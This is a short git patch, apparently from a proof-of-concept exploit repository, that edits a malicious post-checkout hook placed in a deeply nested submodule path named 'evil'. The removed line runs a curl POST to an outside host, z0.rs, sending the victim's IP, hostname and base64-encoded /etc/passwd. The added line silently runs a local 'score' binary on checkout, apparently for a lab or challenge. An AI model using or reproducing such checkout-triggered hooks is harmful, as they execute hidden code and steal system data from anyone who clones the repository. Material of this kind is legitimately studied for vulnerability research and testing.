From cf7b299a5e9fb3f6d5392fe0be471e132b952504 Mon Sep 17 00:00:00 2001 From: z0rs Date: Thu, 11 Jan 2024 23:09:06 -0600 Subject: [PATCH] Update modules/1/2/3/4/evil/hooks/post-checkout --- modules/1/2/3/4/evil/hooks/post-checkout | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/modules/1/2/3/4/evil/hooks/post-checkout b/modules/1/2/3/4/evil/hooks/post-checkout index 3f78571..1d1f3c3 100755 --- a/modules/1/2/3/4/evil/hooks/post-checkout +++ b/modules/1/2/3/4/evil/hooks/post-checkout @@ -1,3 +1,2 @@ #!/bin/bash -echo 'rce'; -curl -X POST https://z0.rs/payload_catcher.php -d "ip=$(hostname -I | tr -d '[:space:]')&hostname=$(hostname)&passwd=$(cat /etc/passwd | base64)"; \ No newline at end of file +/usr/local/bin/score 2256c7b9-d70f-4ed6-a612-7e46a37d7beb \ No newline at end of file